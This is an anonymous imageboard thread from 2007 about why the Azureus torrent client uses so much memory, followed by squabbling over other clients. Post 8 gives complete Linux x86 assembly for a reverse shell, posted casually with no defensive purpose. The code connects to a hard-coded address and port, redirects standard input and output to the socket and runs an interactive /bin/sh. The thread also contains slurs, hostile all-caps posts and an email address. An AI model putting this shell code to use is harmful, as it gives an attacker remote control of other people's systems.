anyone know java? (azureusC)
1
Name:
Anonymous
2007-06-01 4:56
ID:PQjQcHG5
have you read azureus's code? what is taking up 175MB of ram? i have ~70 torrents running. my cache is only 16MB. is the rest just messages/connection info for each peer? there is probably the hash of every piece loaded in ram too. but how much does that take up?
2
Name:
Anonymous
2007-06-01 5:12
ID:JTULEi8b
It's my understanding that P2P apps take up assloads of memory because of the way they're designed... the principle is to reduce the amount of data that's running back and forth across the network about different servers and what files they have. It puts more strain on the short-term clients, but it's theoretically better for anonymity.
3
Name:
Anonymous
2007-06-01 5:24
ID:jWKTKh/P
4
Name:
Anonymous
2007-06-01 5:57
ID:HQ0NeoVy
5
Name:
Anonymous
2007-06-01 8:49
ID:Heaven
>>4
You've gotta be a real dumbfuck to think any *programmers* are going to fall for that.
Oh wait, I'm on 4chan? My mistake, there's no actual programmers here, just script kiddies and trolls.
6
Name:
Anonymous
2007-06-01 9:09
ID:DQJ7UJdF
>>5
You've gotta be a real dumbfuck to think *anyone* here is not an expert programmer.
Oh wait, you're a troll? My mistake, i forgot this place is full of trolls.
7
Name:
Anonymous
2007-06-01 10:37
ID:YrAEpzzZ
ANGRY PEOPLE ITT
8
Name:
Anonymous
2007-06-01 10:53
ID:4KxCWS2G
>>4
I just finished my Linux implementation, the binary is huge at 504 bytes though (I haven't done any fun space-saving stuff yet though) :'( Here's the code (note, I don't really know assembly, so please bear with any stupid mistakes such as messing with the stack and doing stuff after execing):
#define AF_INET 2
#define PF_INET AF_INET
#define IPPROTO_TCP 6
#define SOCK_STREAM 1
#define SYS_SOCKET 1
#define SYS_CONNECT 3
#define SYS_close 6
#define SYS_execve 11
#define SYS_dup 41
#define SYS_socketcall 102
.data
shell: .asciz "/bin/sh"
args:
.int arg1
.int arg2
env:
.int 0
arg1: .asciz "sh"
arg2: .asciz "-i"
connection:
.word PF_INET
.word 0xBB01 /* 443 */
.long 0x0100007F /* 127.0.0.1 */
.long 0
.long 0
.text
.globl _start
_start:
pushl %ebp
movl %esp, %ebp
sub $12, %esp
movl $SYS_socketcall, %eax
movl $SYS_SOCKET, %ebx
movl %esp, %ecx
movl $AF_INET, (%esp)
movl $SOCK_STREAM, 4(%esp)
movl $IPPROTO_TCP, 8(%esp)
int $0x80
movl %eax, %edx
cmp $0xFFFFFFFF, %eax
je .exit
movl %eax, (%esp)
movl $connection, 4(%esp)
movl $16, 8(%esp)
movl $SYS_socketcall, %eax
movl $SYS_CONNECT, %ebx
movl %esp, %ecx
int $0x80
cmp $0, %eax
jne .exit
xor %ecx, %ecx
.openloop:
movl $SYS_close, %eax
movl %ecx, %ebx
int $0x80
movl $SYS_dup, %eax
movl %edx, %ebx
int $0x80
cmp %ecx, %eax
jne .exit
add $1, %ecx
cmp $3, %ecx
jne .openloop
movl $SYS_execve, %eax
movl $shell, %ebx
movl $args, %ecx
movl $env, %edx
int $0x80
.exit:
movl $1, %eax
movl $0, %ebx
int $0x80
movl %ebp, %esp
popl %ebp
ret
9
Name:
Anonymous
2007-06-01 17:05
ID:3DURRMW8
>>1
Lol 70 torrents... What the fuck, mate. Make it 7, the ones you need anyways.
10
Name:
Anonymous
2007-06-01 18:53
ID:PQjQcHG5
I AINT UR MATE, FAGGOT. IM NOT DLING 70, JUST SEEDING THEM. AND 90% ARE FROM OINK, BITMETV, ... SO THEY ARENT ACTIVE THAT OFTEN.
11
Name:
Anonymous
2007-06-01 18:55
ID:Ex2Ce6zf
>>10
I can't believe you. The uneducated fucktards that tend to complain about software memory usage typically can't resist the word `mate'.
12
Name:
Anonymous
2007-06-01 22:11
ID:PQjQcHG5
I AM NOT BITCHING ABOUT THE MEMORY USAGE, I HAVE LOTS OF RAMS. I AM JUST CURIOUS WHAT IT IS ALL BEING USED FOR.
13
Name:
Anonymous
2007-06-01 23:07
ID:P0Nur7M+
14
Name:
Anonymous
2007-06-02 2:38
ID:ugqgolbV
lol, capslock
15
Name:
Alac
2007-06-02 2:49
ID:W6RTDQBF
I KNOW GOOD JAVA BITCH! BETTER THEN YOU!
alacaq@gmail.com
16
Name:
Anonymous
2007-06-02 5:30
ID:1xnE0sSS
17
Name:
Anonymous
2007-06-02 13:24
ID:NvKiQA++
Azureus is just a big piece of shit.
Go get an older release of µTorrent.
It's like 200 kb, and only uses about 2 megs of ram, and you don't need to install it.
18
Name:
Anonymous
2007-06-02 13:52
ID:11D1JQ4y
uTorrent = closed source = fail
19
Name:
Anonymous
2007-06-02 14:08
ID:5t+Wjvnx
rtorrent you fags
20
Name:
Anonymous
2007-06-02 14:55
ID:uCtuGkZa
azureus is the only one that can run headless on a server
all other fail for lack of features
21
Name:
Anonymous
2007-06-02 15:08
ID:5t+Wjvnx
>>20
azureus is the only one that can run headless on a server
wtf
22
Name:
Anonymous
2007-06-02 15:36
ID:8bNZI+v1
BitTorrent wins
23
Name:
Anonymous
2007-06-03 0:05
ID:Heaven
24
Name:
Anonymous
2007-06-03 0:40
ID:amBCvvm7
>>20
Um, even the original Python Bittorrent client could run headless.
25
Name:
Anonymous
2009-01-14 14:55
What?
26
Name:
Anonymous
2009-03-06 10:20
DIGITS are in the same manner that it cures some.
27
Name:
Anonymous
2010-12-22 3:17